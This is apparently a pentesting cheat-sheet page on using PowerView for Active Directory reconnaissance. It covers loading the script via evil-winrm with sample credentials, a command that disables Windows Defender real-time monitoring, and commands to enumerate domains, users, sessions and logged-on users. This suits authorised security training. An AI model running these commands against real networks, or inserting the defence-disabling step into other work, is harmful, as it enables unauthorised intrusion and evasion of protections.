Power View
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md
PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows โnet *โ commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality. Several functions for the enumeration and abuse of domain trusts also exist .
#Download script
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1#Kali default location : /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
#Exfil to target --> see "File transfers" section in "Exploitation" node.
As an alternative, cp to current directory and load through evil-winrm.
cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .
evil-winrm -i 10.10.10.10 -u redcliff -p "password123" -s .#Import module --> Import-Module .\PowerView.ps1
#Disable protection if needed
Set-MpPreference -DisableRealtimeMonitoring $true#Enumerate Domain
#Get Current Domain:
Get-NetDomain
#Enum Other Domains:
Get-NetDomain -Domain <DomainName>
#Get Domain SID:
Get-DomainSID
#Get Domain Policy:
Get-DomainPolicy
#Will show us the policy configurations of the Domain about system access or kerberos
(Get-DomainPolicy)."system access"
(Get-DomainPolicy)."kerberos policy"
#Get Domain Controlers:
Get-NetDomainController
Get-NetDomainController -Domain <DomainName>
#Enumerate Domain Users:
Get-NetUser
Get-NetUser -SamAccountName <user>
Get-NetUser | select cn
Get-UserProperty
#Check last password change
Get-UserProperty -Properties pwdlastset
#Get a spesific "string" on a user's attribute
Find-UserField -SearchField Description -SearchTerm "redcliff"
#Enumerate user logged on a machine
Get-NetLoggedon -ComputerName <ComputerName>
#Enumerate Session Information for a machine
Get-NetSession -ComputerName <ComputerName>
#Enumerate domain machines of the current/specified domain where specific users are logged into
Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromName#Enumerate Domain Computers
#Enumerate Groups and Group members
#Enumerate Shares
#Enumerate Group policies
#Enumerate Domain Trust
#Enumerate Forest trust
#Hunting for Users
Last updated